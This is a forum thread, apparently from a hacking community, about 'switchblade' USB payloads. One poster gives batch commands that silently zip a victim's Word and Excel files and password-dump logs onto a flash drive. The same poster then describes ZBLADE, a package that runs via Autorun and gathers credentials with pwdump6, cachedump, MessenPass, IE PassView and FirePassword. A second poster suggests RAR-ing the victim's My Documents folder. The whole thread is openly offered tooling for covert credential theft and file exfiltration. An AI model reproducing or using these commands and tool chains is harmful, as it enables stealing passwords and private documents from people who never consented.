Saving drive space: using ZIP to compress switchblade dumpfiles

[kz26]

Using a switchblade to dump a user's files can get very large. It would be in everyone's interest to maximize their drive's usefulness by first compressing the entire contents of a switchblade dump.

I accomplished using InfoZip, which is a small and portable ZIP creation program very suitable for a switchblade environment. It doesn't seem like anyone has implemented this before, so I'll post it here.

Step 1.

Visit http://www.info-zip.org/Zip.html#Win32 and download InfoZip 2.32 from any of the mirrors.

Step 2. Put zip.exe in your switchblade's main program directory.

Step 3. Add the appropriate code for ZIP-compressing the user's files and/or the produced dump logfiles.

REM Create Zip of user's files with the following extensions
set dumpext = *.doc *.docx *.xls *.xlsx *.cls
zip.exe -r9q ..dumps%computername%%computername%-files.zip "%homedrive%%homepath%" -i %dumpext%

REM Zip Dumpfiles
zip.exe -m9jDq ..dumps%computername%%computername%.zip ..dumps%computername%*.txt

Feel free to improve upon this idea. I hope people will find this practical and efficient 

[kz26]

UPDATE: I've updated my own ZBLADE custom payload to use the ZIP technique.

Here's a description:

ZBLADE

List of programs

    * pwdump6 1.5.0

    * cachedump 1.2beta

    * NirCmd 1.85

    * MessenPass v1.10

    * IE PassView v1.04

    * Protected Storage PassView v1.63

    * Network Password Recovery v1.10

    * ProduKey v1.06

    * FirePassword 2.0.1

    * InfoZip/Zip 2.32

Installation

Input the Windows drive letter of your removable media as prompted below. For example, if your drive was the F drive, type in "F:" without the quotes.

Program Features

This ZBLADE package is designed for use on a writable removable media such as a USB flash drive or Zip disk. The silent-run capability is dependent on the Autorun/Autoplay feature of Windows (manual run is required if Autorun/Autoplay is disabled.)

The program runs the password dumpers as listed above and gathers basic information about the logged-in user and the computer. Its most special feature is the ability to copy certain filetypes from the user's account to the removable media. All dumped/generated files are compressed using InfoZip into tidy, convenient packages.

The download is a WinRAR SFX installer for the ZBLADE. Link is in my signature.

[elmer]

You could also integrate RAR into your payload. I made a payload that RAR's up the My Documents folder onto the thumbdrive. I haven't tried to RAR the logs, but it could be another solution to the same problem. I got my rar.exe file from the HackSaw, and I am not sure where to get a standalone copy.